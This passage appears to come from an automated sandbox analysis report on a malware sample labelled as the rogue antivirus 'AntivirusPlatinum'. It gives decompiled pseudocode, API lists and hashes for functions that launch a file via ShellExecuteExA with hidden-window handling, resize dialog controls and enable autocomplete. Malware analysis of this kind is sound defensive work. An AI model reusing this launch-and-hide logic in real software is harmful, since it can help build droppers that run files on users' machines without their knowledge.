                                                                                                                                                  				char* _t94;
                                                                                                                                                  				long _t96;
                                                                                                                                                  				char* _t99;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  				intOrPtr _t127;
                                                                                                                                                  
                                                                                                                                                  				_t99 = __eax;
                                                                                                                                                  				_t56 = E0040A384(__ecx, __eax);
                                                                                                                                                  				if(_t56 >= 0x3f6) {
                                                                                                                                                  					return _t56;
                                                                                                                                                  				}
                                                                                                                                                  				_t96 = 0x3c;
                                                                                                                                                  				E0040A289(__ecx,  &_v72, 0, _t96);
                                                                                                                                                  				_t93 =  *_t99;
                                                                                                                                                  				_v72.cbSize = _t96;
                                                                                                                                                  				_v72.fMask = 0x5c0;
                                                                                                                                                  				if(_t93 != 0x22) {
                                                                                                                                                  					_v72.lpFile = _t99;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v72.lpFile = _t99 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_t59 = 0;
                                                                                                                                                  				if(_t93 == 0) {
                                                                                                                                                  					L19:
                                                                                                                                                  					if(_a4 == 0 &&  *0x41a392 != 0) {
                                                                                                                                                  						_v72.lpParameters = 0x41a392;
                                                                                                                                                  					}
                                                                                                                                                  					_v72.nShow = 1;
                                                                                                                                                  					_t60 = E00407690(_v72.lpFile);
                                                                                                                                                  					_v12 = _t60;
                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                  						_t85 = E0040A59A(_t60, ".inf");
                                                                                                                                                  						_t112 = _t85;
                                                                                                                                                  						if(_t85 == 0) {
                                                                                                                                                  							_v72.lpVerb = "Install";
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t61 = E00405767(_t112, _v72.lpFile, 0);
                                                                                                                                                  					_v5 = _t61;
                                                                                                                                                  					if(_t61 != 0) {
                                                                                                                                                  						E00405822(_v72.lpFile,  &_v2120);
                                                                                                                                                  						_v72.lpFile =  &_v2120;
                                                                                                                                                  					}
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						L30:
                                                                                                                                                  						_t63 = ShellExecuteExA( &_v72); // executed
                                                                                                                                                  						if((_t63 & 0xffffff00 | _t63 != 0x00000000) != 0) {
                                                                                                                                                  							L32:
                                                                                                                                                  							_v5 = 0;
                                                                                                                                                  							_t121 =  *0x419f88; // 0x0
                                                                                                                                                  							if(_t121 != 0 || _a4 != 0) {
                                                                                                                                                  								_t65 =  *0x419f80; // 0x0
                                                                                                                                                  								if(_t65 != 0 && IsWindowVisible(_t65) != 0) {
                                                                                                                                                  									ShowWindow( *0x419f80, 0);
                                                                                                                                                  									_v5 = 1;
                                                                                                                                                  								}
                                                                                                                                                  								WaitForInputIdle(_v72.hProcess, 0x7d0);
                                                                                                                                                  								E0040B6EA(_v72.hProcess);
                                                                                                                                                  							}
                                                                                                                                                  							_t68 = CloseHandle(_v72.hProcess);
                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                  								L40:
                                                                                                                                                  								_t127 =  *0x419f88; // 0x0
                                                                                                                                                  								if(_t127 == 0 || _a4 != 0) {
                                                                                                                                                  									__eflags = _a4;
                                                                                                                                                  									_t68 = ((0 | _a4 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                                                                                  									__eflags = _t68;
                                                                                                                                                  									Sleep(_t68);
                                                                                                                                                  								} else {
                                                                                                                                                  									Sleep(0x1b58);
                                                                                                                                                  								}
                                                                                                                                                  								goto L45;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t68 = E0040A59A(_v12, ".exe");
                                                                                                                                                  								if(_t68 == 0) {
                                                                                                                                                  									L45:
                                                                                                                                                  									if(_v5 != 0) {
                                                                                                                                                  										_t68 = ShowWindow( *0x419f80, 1);
                                                                                                                                                  									}
                                                                                                                                                  									goto L47;
                                                                                                                                                  								}
                                                                                                                                                  								goto L40;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_v72.fMask = _v72.fMask & 0xfffffbff;
                                                                                                                                                  						_v72.lpFile = _t99;
                                                                                                                                                  						_t68 = ShellExecuteExA( &_v72) & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                  							goto L47;
                                                                                                                                                  						}
                                                                                                                                                  						goto L32;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t115 = _v5;
                                                                                                                                                  						if(_v5 != 0) {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  						E0040A477( &_v1096, _v72.lpFile);
                                                                                                                                                  						E0040A5E2( &_v1096, ".exe");
                                                                                                                                                  						_t68 = E00405767(_t115,  &_v1096, 0);
                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                  							L47:
                                                                                                                                                  							return _t68;
                                                                                                                                                  						}
                                                                                                                                                  						goto L30;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t94 = _t99;
                                                                                                                                                  					do {
                                                                                                                                                  						if( *_t94 != 0x22) {
                                                                                                                                                  							L12:
                                                                                                                                                  							if( *((char*)(_t59 + _t99)) == 0x20 ||  *((char*)(_t59 + _t99 + 1)) == 0x2f) {
                                                                                                                                                  								_t86 = _t59 + _t99;
                                                                                                                                                  								__eflags =  *_t86 - 0x20;
                                                                                                                                                  								if( *_t86 == 0x20) {
                                                                                                                                                  									 *_t86 = 0;
                                                                                                                                                  								}
                                                                                                                                                  								_t87 = _t86 + 1;
                                                                                                                                                  								__eflags = _t87;
                                                                                                                                                  								_v72.lpParameters = _t87;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L14;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t59 = _t59 + 1;
                                                                                                                                                  							if( *((intOrPtr*)(_t59 + _t99)) == 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *((char*)(_t59 + _t99)) - 0x22;
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								 *((char*)(_t59 + _t99)) = 0x20;
                                                                                                                                                  								goto L12;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L12;
                                                                                                                                                  						L14:
                                                                                                                                                  						_t59 = _t59 + 1;
                                                                                                                                                  						_t94 = _t59 + _t99;
                                                                                                                                                  					} while ( *_t94 != 0);
                                                                                                                                                  					goto L19;
                                                                                                                                                  				}
                                                                                                                                                  			}
























                                                                                                                                                  0x0040bd8a
                                                                                                                                                  0x0040bd8d
                                                                                                                                                  0x0040bd97
                                                                                                                                                  0x0040bf96
                                                                                                                                                  0x0040bf96
                                                                                                                                                  0x0040bda1
                                                                                                                                                  0x0040bdaa
                                                                                                                                                  0x0040bdaf
                                                                                                                                                  0x0040bdb1
                                                                                                                                                  0x0040bdb4
                                                                                                                                                  0x0040bdbe
                                                                                                                                                  0x0040bdc8
                                                                                                                                                  0x0040bdc0
                                                                                                                                                  0x0040bdc3
                                                                                                                                                  0x0040bdc3
                                                                                                                                                  0x0040bdcb
                                                                                                                                                  0x0040bdcf
                                                                                                                                                  0x0040be10
                                                                                                                                                  0x0040be13
                                                                                                                                                  0x0040be1d
                                                                                                                                                  0x0040be1d
                                                                                                                                                  0x0040be27
                                                                                                                                                  0x0040be2e
                                                                                                                                                  0x0040be33
                                                                                                                                                  0x0040be38
                                                                                                                                                  0x0040be40
                                                                                                                                                  0x0040be45
                                                                                                                                                  0x0040be47
                                                                                                                                                  0x0040be49
                                                                                                                                                  0x0040be49
                                                                                                                                                  0x0040be47
                                                                                                                                                  0x0040be54
                                                                                                                                                  0x0040be59
                                                                                                                                                  0x0040be5e
                                                                                                                                                  0x0040be6a
                                                                                                                                                  0x0040be75
                                                                                                                                                  0x0040be75
                                                                                                                                                  0x0040be7b
                                                                                                                                                  0x0040beb7
                                                                                                                                                  0x0040bec1
                                                                                                                                                  0x0040beca
                                                                                                                                                  0x0040bee9
                                                                                                                                                  0x0040beef
                                                                                                                                                  0x0040bef2
                                                                                                                                                  0x0040bef8
                                                                                                                                                  0x0040beff
                                                                                                                                                  0x0040bf06
                                                                                                                                                  0x0040bf1a
                                                                                                                                                  0x0040bf1c
                                                                                                                                                  0x0040bf1c
                                                                                                                                                  0x0040bf28
                                                                                                                                                  0x0040bf31
                                                                                                                                                  0x0040bf31
                                                                                                                                                  0x0040bf39
                                                                                                                                                  0x0040bf42
                                                                                                                                                  0x0040bf55
                                                                                                                                                  0x0040bf55
                                                                                                                                                  0x0040bf5b
                                                                                                                                                  0x0040bf6b
                                                                                                                                                  0x0040bf77
                                                                                                                                                  0x0040bf77
                                                                                                                                                  0x0040bf7d
                                                                                                                                                  0x0040bf62
                                                                                                                                                  0x0040bf7d
                                                                                                                                                  0x0040bf7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf44
                                                                                                                                                  0x0040bf4c
                                                                                                                                                  0x0040bf53
                                                                                                                                                  0x0040bf83
                                                                                                                                                  0x0040bf86
                                                                                                                                                  0x0040bf90
                                                                                                                                                  0x0040bf90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf86
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf53
                                                                                                                                                  0x0040bf42
                                                                                                                                                  0x0040becc
                                                                                                                                                  0x0040bed7
                                                                                                                                                  0x0040bede
                                                                                                                                                  0x0040bee3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be7d
                                                                                                                                                  0x0040be7d
                                                                                                                                                  0x0040be80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be8c
                                                                                                                                                  0x0040be9d
                                                                                                                                                  0x0040beaa
                                                                                                                                                  0x0040beb1
                                                                                                                                                  0x0040bf92
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040beb1
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bdd1
                                                                                                                                                  0x0040bdd3
                                                                                                                                                  0x0040bdd6
                                                                                                                                                  0x0040bdec
                                                                                                                                                  0x0040bdf0
                                                                                                                                                  0x0040be03
                                                                                                                                                  0x0040be05
                                                                                                                                                  0x0040be08
                                                                                                                                                  0x0040be0a
                                                                                                                                                  0x0040be0a
                                                                                                                                                  0x0040be0c
                                                                                                                                                  0x0040be0c
                                                                                                                                                  0x0040be0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdf0
                                                                                                                                                  0x0040bde0
                                                                                                                                                  0x0040bde0
                                                                                                                                                  0x0040bde4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdda
                                                                                                                                                  0x0040bdde
                                                                                                                                                  0x0040bde8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bde8
                                                                                                                                                  0x0040bdde
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdf9
                                                                                                                                                  0x0040bdf9
                                                                                                                                                  0x0040bdfa
                                                                                                                                                  0x0040bdfd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be01

                                                                                                                                                  APIs
                                                                                                                                                  • ShellExecuteExA.SHELL32(?,?,00000000,?,?,00000000,0000003C), ref: 0040BEC1
                                                                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 0040BEDA
                                                                                                                                                  • IsWindowVisible.USER32 ref: 0040BF09
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040BF1A
                                                                                                                                                  • WaitForInputIdle.USER32 ref: 0040BF28
                                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 0040BF39
                                                                                                                                                  • Sleep.KERNEL32(-000003E9), ref: 0040BF7D
                                                                                                                                                  • ShowWindow.USER32(00000001), ref: 0040BF90
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ExecuteShellShow$CloseHandleIdleInputSleepVisibleWait
                                                                                                                                                  • String ID: .exe$.inf$H&A
                                                                                                                                                  • API String ID: 1160896117-531445332
                                                                                                                                                  • Opcode ID: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                  • Instruction ID: a16589b2b5277c8e661bbc98e08cb4bbb4dd1f4ec6966d8106822106ff6d3530
                                                                                                                                                  • Opcode Fuzzy Hash: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                  • Instruction Fuzzy Hash: 5351B171845289BEDB21EBA0DC44ADE7BA9EF04304F1484BBE540F72D2D3798D858B9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 838 40970e-409766 call 409637 GetWindowRect GetClientRect 841 409768-40976c 838->841 842 40979b-40979f 838->842 843 4097db-4097fa GetSystemMetrics GetWindow 841->843 844 40976e-409795 SetWindowPos 841->844 842->843 845 4097a1-4097d5 GetWindowTextA call 409553 SetWindowTextA 842->845 846 4098d1-4098d3 843->846 844->842 845->843 848 4098d9-4098dd 846->848 849 4097ff-409806 846->849 849->848 851 40980c-409828 GetWindowTextA 849->851 852 40982a-409849 call 409553 SetWindowTextA 851->852 853 40984f-409853 851->853 852->853 855 409855-4098b5 GetWindowRect SetWindowPos 853->855 856 4098bb-4098cc GetWindow 853->856 855->856 856->848 858 4098ce 856->858 858->846
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E0040970E(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				struct HWND__* _v24;
                                                                                                                                                  				struct tagRECT _v40;
                                                                                                                                                  				struct tagRECT _v56;
                                                                                                                                                  				struct tagRECT _v72;
                                                                                                                                                  				char _v1096;
                                                                                                                                                  				signed int _t96;
                                                                                                                                                  				struct HWND__* _t98;
                                                                                                                                                  				signed int _t116;
                                                                                                                                                  				signed int _t123;
                                                                                                                                                  				signed int _t147;
                                                                                                                                                  				signed int _t150;
                                                                                                                                                  				signed int _t153;
                                                                                                                                                  				void* _t163;
                                                                                                                                                  				void* _t167;
                                                                                                                                                  				void* _t168;
                                                                                                                                                  
                                                                                                                                                  				_v20 = __ecx;
                                                                                                                                                  				_v5 = E00409637(__ecx, __eflags, _a8,  &_v16,  &_v12);
                                                                                                                                                  				GetWindowRect(_a4,  &_v40);
                                                                                                                                                  				GetClientRect(_a4,  &_v72);
                                                                                                                                                  				_t96 = _v72.bottom;
                                                                                                                                                  				_t163 = _v40.right - _v72.right - _v40.left + 1;
                                                                                                                                                  				_t167 = _v40.bottom - _t96 - _v40.top + 1;
                                                                                                                                                  				if(_v5 == 0) {
                                                                                                                                                  					L3:
                                                                                                                                                  					if(_a12 == 0) {
                                                                                                                                                  						GetWindowTextA(_a4,  &_v1096, 0x400);
                                                                                                                                                  						E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                  						SetWindowTextA(_a4,  &_v1096); // executed
                                                                                                                                                  					}
                                                                                                                                                  					L5:
                                                                                                                                                  					_t168 = _t167 - GetSystemMetrics(8);
                                                                                                                                                  					_t98 = GetWindow(_a4, 5);
                                                                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                                                                  					_a12 = _t98;
                                                                                                                                                  					_v24 = _t98;
                                                                                                                                                  					while(_t98 != 0) {
                                                                                                                                                  						__eflags = _a4 - 0x200;
                                                                                                                                                  						if(_a4 >= 0x200) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						GetWindowTextA(_a12,  &_v1096, 0x400); // executed
                                                                                                                                                  						__eflags = _v1096;
                                                                                                                                                  						if(_v1096 != 0) {
                                                                                                                                                  							E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                  							SetWindowTextA(_a12,  &_v1096); // executed
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _v5;
                                                                                                                                                  						if(_v5 != 0) {
                                                                                                                                                  							GetWindowRect(_a12,  &_v56);
                                                                                                                                                  							_push(0x204);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t147 = 0x64;
                                                                                                                                                  							_push((_v56.bottom - _v56.top + 1) * _v12 / _t147);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_push((_v56.right - _v56.left + 1) * _v16 / _t147);
                                                                                                                                                  							_t116 = (_v56.top - _v40.top - _t168) * _v12;
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_push(_t116 / _t147);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t123 = (_v56.left - (_t163 - _t116 % _t147 >> 1) - _v40.left) * _v16;
                                                                                                                                                  							_t150 = 0x64;
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							__eflags = _t123 % _t150;
                                                                                                                                                  							SetWindowPos(_a12, 0, _t123 / _t150, ??, ??, ??, ??);
                                                                                                                                                  						}
                                                                                                                                                  						_t98 = GetWindow(_a12, 2);
                                                                                                                                                  						_a12 = _t98;
                                                                                                                                                  						__eflags = _t98 - _v24;
                                                                                                                                                  						if(_t98 == _v24) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t87 =  &_a4;
                                                                                                                                                  							 *_t87 = _a4 + 1;
                                                                                                                                                  							__eflags =  *_t87;
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					return _t98;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  				_push(0x206);
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t153 = 0x64;
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				SetWindowPos(_a4, 0, 0, 0, _v72.right * _v16 / _t153 + _t163, _t96 * _v12 / _t153 + _t167, ??);
                                                                                                                                                  				goto L3;
                                                                                                                                                  			}






















                                                                                                                                                  0x00409725
                                                                                                                                                  0x00409733
                                                                                                                                                  0x0040973d
                                                                                                                                                  0x00409746
                                                                                                                                                  0x00409755
                                                                                                                                                  0x00409760
                                                                                                                                                  0x00409761
                                                                                                                                                  0x00409766
                                                                                                                                                  0x0040979b
                                                                                                                                                  0x0040979f
                                                                                                                                                  0x004097b0
                                                                                                                                                  0x004097c6
                                                                                                                                                  0x004097d5
                                                                                                                                                  0x004097d5
                                                                                                                                                  0x004097db
                                                                                                                                                  0x004097e8
                                                                                                                                                  0x004097ea
                                                                                                                                                  0x004097f0
                                                                                                                                                  0x004097f4
                                                                                                                                                  0x004097f7
                                                                                                                                                  0x004098d1
                                                                                                                                                  0x004097ff
                                                                                                                                                  0x00409806
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040981b
                                                                                                                                                  0x00409821
                                                                                                                                                  0x00409828
                                                                                                                                                  0x0040983a
                                                                                                                                                  0x00409849
                                                                                                                                                  0x00409849
                                                                                                                                                  0x0040984f
                                                                                                                                                  0x00409853
                                                                                                                                                  0x0040985c
                                                                                                                                                  0x00409864
                                                                                                                                                  0x0040986e
                                                                                                                                                  0x00409871
                                                                                                                                                  0x00409874
                                                                                                                                                  0x00409880
                                                                                                                                                  0x00409883
                                                                                                                                                  0x0040988c
                                                                                                                                                  0x00409890
                                                                                                                                                  0x00409893
                                                                                                                                                  0x00409896
                                                                                                                                                  0x004098a7
                                                                                                                                                  0x004098ab
                                                                                                                                                  0x004098ac
                                                                                                                                                  0x004098ad
                                                                                                                                                  0x004098b5
                                                                                                                                                  0x004098b5
                                                                                                                                                  0x004098c0
                                                                                                                                                  0x004098c6
                                                                                                                                                  0x004098c9
                                                                                                                                                  0x004098cc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004098ce
                                                                                                                                                  0x004098ce
                                                                                                                                                  0x004098ce
                                                                                                                                                  0x004098ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004098ce
                                                                                                                                                  0x004098cc
                                                                                                                                                  0x004098dd
                                                                                                                                                  0x004098dd
                                                                                                                                                  0x0040976c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409772
                                                                                                                                                  0x00409777
                                                                                                                                                  0x0040977a
                                                                                                                                                  0x00409787
                                                                                                                                                  0x00409795
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowRect.USER32 ref: 0040973D
                                                                                                                                                  • GetClientRect.USER32 ref: 00409746
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000110,?,00000206,?,?,00000000), ref: 00409795
                                                                                                                                                  • GetWindowTextA.USER32 ref: 004097B0
                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 004097D5
                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004097DD
                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004097EA
                                                                                                                                                  • GetWindowTextA.USER32 ref: 0040981B
                                                                                                                                                  • SetWindowTextA.USER32(00000000,00000000), ref: 00409849
                                                                                                                                                  • GetWindowRect.USER32 ref: 0040985C
                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000110,00000200,00000110,00000200,00000204,?,?,00000000), ref: 004098B5
                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004098C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Text$Rect$ClientMetricsSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3650388129-0
                                                                                                                                                  • Opcode ID: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                  • Instruction ID: 4bbafb19eaccdd502d9e93db46d4c5b42238c20fbbadc0178a3eb5a30deeaea3
                                                                                                                                                  • Opcode Fuzzy Hash: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                  • Instruction Fuzzy Hash: 76512B72900209AFEF05DFA8CD49FEEBBB9EB48300F048066FA05E61A1D7759E55CB54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 948 40aafc-40ab0a call 406ea5 951 40ab10-40ab17 948->951 952 40ab9d-40ab9e 948->952 953 40ab56-40ab69 GetClassNameA 951->953 954 40ab19-40ab20 951->954 956 40ab6b-40ab7e lstrcmpiA 953->956 957 40ab8f-40ab91 953->957 954->952 955 40ab22-40ab2f GetModuleHandleA 954->955 958 40ab31-40ab3d GetProcAddress 955->958 959 40ab42-40ab54 955->959 960 40ab80-40ab8c FindWindowExA 956->960 961 40ab8e 956->961 962 40ab93-40ab96 SHAutoComplete 957->962 963 40ab9c 957->963 958->959 959->952 959->953 960->961 961->957 962->963 963->952
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040AAFC(signed int __ecx, void* __eflags, long _a4) {
                                                                                                                                                  				char _v84;
                                                                                                                                                  				intOrPtr _t6;
                                                                                                                                                  				long _t8;
                                                                                                                                                  				struct HINSTANCE__* _t10;
                                                                                                                                                  				signed int _t12;
                                                                                                                                                  				long _t15;
                                                                                                                                                  				CHAR* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t12 = __ecx;
                                                                                                                                                  				_t6 = E00406EA5();
                                                                                                                                                  				if(_t6 >= 5) {
                                                                                                                                                  					if( *0x41f314 != 0) {
                                                                                                                                                  						L6:
                                                                                                                                                  						_t15 = _a4;
                                                                                                                                                  						_t8 = GetClassNameA(_t15,  &_v84, 0x50);
                                                                                                                                                  						if(_t8 != 0) {
                                                                                                                                                  							_t18 = "EDIT";
                                                                                                                                                  							_t8 = lstrcmpiA( &_v84, _t18);
                                                                                                                                                  							if(_t8 != 0) {
                                                                                                                                                  								_t8 = FindWindowExA(_t15, 0, _t18, 0); // executed
                                                                                                                                                  								_t15 = _t8;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_t15 != 0) {
                                                                                                                                                  							_t8 = SHAutoComplete(_t15, 0x10); // executed
                                                                                                                                                  						}
                                                                                                                                                  						return _t8;
                                                                                                                                                  					}
                                                                                                                                                  					if( *0x41f312 == 0) {
                                                                                                                                                  						_t10 = GetModuleHandleA("shlwapi.dll");
                                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                                  							 *0x41f314 = GetProcAddress(_t10, "SHAutoComplete");
                                                                                                                                                  						}
                                                                                                                                                  						_t6 =  *0x41f314;
                                                                                                                                                  						 *0x41f312 = _t12 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                  						if(_t6 != 0) {
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}










                                                                                                                                                  0x0040aafc
                                                                                                                                                  0x0040ab02
                                                                                                                                                  0x0040ab0a
                                                                                                                                                  0x0040ab17
                                                                                                                                                  0x0040ab56
                                                                                                                                                  0x0040ab57
                                                                                                                                                  0x0040ab61
                                                                                                                                                  0x0040ab69
                                                                                                                                                  0x0040ab6c
                                                                                                                                                  0x0040ab76
                                                                                                                                                  0x0040ab7e
                                                                                                                                                  0x0040ab86
                                                                                                                                                  0x0040ab8c
                                                                                                                                                  0x0040ab8c
                                                                                                                                                  0x0040ab8e
                                                                                                                                                  0x0040ab91
                                                                                                                                                  0x0040ab96
                                                                                                                                                  0x0040ab96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ab9c
                                                                                                                                                  0x0040ab20
                                                                                                                                                  0x0040ab27
                                                                                                                                                  0x0040ab2f
                                                                                                                                                  0x0040ab3d
                                                                                                                                                  0x0040ab3d
                                                                                                                                                  0x0040ab42
                                                                                                                                                  0x0040ab4c
                                                                                                                                                  0x0040ab54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ab54
                                                                                                                                                  0x0040ab20
                                                                                                                                                  0x0040ab9e

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • GetModuleHandleA.KERNEL32(shlwapi.dll), ref: 0040AB27
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB37
                                                                                                                                                  • GetClassNameA.USER32(?,?,00000050), ref: 0040AB61
                                                                                                                                                  • lstrcmpiA.KERNEL32(?,EDIT,?), ref: 0040AB76
                                                                                                                                                  • FindWindowExA.USER32 ref: 0040AB86
                                                                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0040AB96
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
